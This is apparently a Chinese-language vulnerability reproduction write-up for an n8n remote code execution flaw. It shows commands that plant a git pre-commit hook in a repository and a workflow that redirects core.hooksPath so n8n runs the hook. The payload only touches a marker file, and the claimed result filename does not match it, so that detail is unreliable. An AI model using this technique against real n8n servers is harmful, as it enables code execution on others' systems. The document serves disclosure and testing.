## 复现步骤

首先准备一个包含恶意文件的仓库
```
mkdir n8n-rce-poc && cd n8n-rce-poc
git init
git remote add origin <仓库地址>

mkdir evil_hooks
echo '#!/bin/sh' > evil_hooks/pre-commit
echo 'touch /tmp/pwned_success' >> evil_hooks/pre-commit

chmod +x evil_hooks/pre-commit
git add evil_hooks/pre-commit
git update-index --chmod=+x evil_hooks/pre-commit

git commit -m "Add malicious hook"
git branch -M main
git push -u origin main
```

然后在本地起一个处于受害版本内的n8n的docker，该漏洞影响范围很大，0.123.1 ≤ n8n < 1.119.2都受影响，我们这里使用1.64.3

```
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  n8nio/n8n:1.64.3
```

首先，1.64.3版本的完整攻击流如下

<img width="1261" height="917" alt="image" src="https://github.com/user-attachments/assets/59a238ec-0480-4859-b692-466689f8296e" />

### 节点1:Git（Action：Clone a repository）

参数配置如图

<img width="406" height="396" alt="image" src="https://github.com/user-attachments/assets/59de30d4-eab2-4b07-939d-fe6eb0ae2d04" />

### 节点2:Code（Mode：Run Once for All Items）

该节点和下一个节点是因为由于git只有在文件发生变化时才允许 Commit，所以我们需要先随便写个文件进去。

参数配置如图

<img width="786" height="597" alt="image" src="https://github.com/user-attachments/assets/972f47ca-4a6c-4687-a12d-f5880a50ef2c" />

### 节点3:Read/Write Files from Disk（Action：Write）

将文件写入仓库

参数配置如图

<img width="394" height="522" alt="image" src="https://github.com/user-attachments/assets/5f2cf340-223b-44eb-9648-375ec159f730" />

### 节点4、5:Git（Action：Add configuration property）

这两个节点是因为commit需要email和username，编两个就行

参数配置如图

<img width="393" height="490" alt="image" src="https://github.com/user-attachments/assets/66918a42-8b47-48da-abe2-dc01e1417a7a" />

<img width="389" height="509" alt="image" src="https://github.com/user-attachments/assets/7f87745f-d70b-4ce0-9513-d31207cf2801" />

### 节点6:Git（Action: Commit files or folders to git）

核心步骤，将core.hooksPath指向我们下载的恶意目录，强制git在执行hook时去我们指定的目录查找（默认为.git/hooks）

（感觉跟劫持LD_PRELOAD啥的是一类的）

参数配置如图

<img width="391" height="538" alt="image" src="https://github.com/user-attachments/assets/c5e65726-3d9f-4041-9dbf-459a247990ea" />


### 节点7:Git（Action：Commit files or folders to git）

这一步用来触发漏洞执行被篡改的hook

参数配置如图

<img width="391" height="504" alt="image" src="https://github.com/user-attachments/assets/e10f5944-1cdd-44a3-bd38-e60deba83287" />

配置完这些节点后，执行工作流即可

然后在docker中观察，发现恶意文件pwned_without_exec_node已经被创建

<img width="392" height="48" alt="image" src="https://github.com/user-attachments/assets/41676d61-8764-4939-8eb4-1a38e94930da" />
